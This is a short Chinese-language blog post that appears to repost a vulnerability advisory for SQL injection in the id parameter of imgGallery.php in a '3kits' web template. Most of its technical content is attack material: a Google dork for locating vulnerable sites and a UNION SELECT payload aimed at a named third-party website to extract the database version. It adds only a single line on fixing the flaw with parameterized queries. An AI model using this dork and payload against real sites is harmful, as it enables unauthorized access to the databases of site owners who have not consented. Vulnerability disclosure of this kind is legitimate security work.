3kits模板imgGallery.php参数SQL注入漏洞分析

本文详细分析了3kits模板中imgGallery.php文件的id参数存在的SQL注入漏洞,包含漏洞发现过程、利用方法和验证演示,涉及网络安全和数据库安全技术。

3kits模板SQL注入漏洞分析

漏洞信息

  • 漏洞标题: 3kits - SQL注入
  • 发现日期: 2025年11月3日
  • 漏洞作者: Hossein_0xB
  • 风险等级: 中等
  • 漏洞类别: Web应用程序
  • 测试环境: Windows 10

技术细节

该漏洞存在于3kits模板的imgGallery.php文件中,具体为id参数未经过滤直接拼接SQL查询,导致SQL注入漏洞。

利用方法

使用以下Google Dork可发现受影响的网站:

1
"Designed & Developed by 3kits"

验证演示

通过构造恶意请求验证漏洞存在:

1
https://hyderabadrealtors.org/imgGallery.php?id=-3 union select 1,version(),3,4

此Payload通过联合查询获取数据库版本信息,证实存在SQL注入漏洞。

发现者信息

补充说明

该漏洞允许攻击者通过精心构造的SQL语句获取数据库敏感信息,建议使用参数化查询或输入验证来修复此安全漏洞。

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计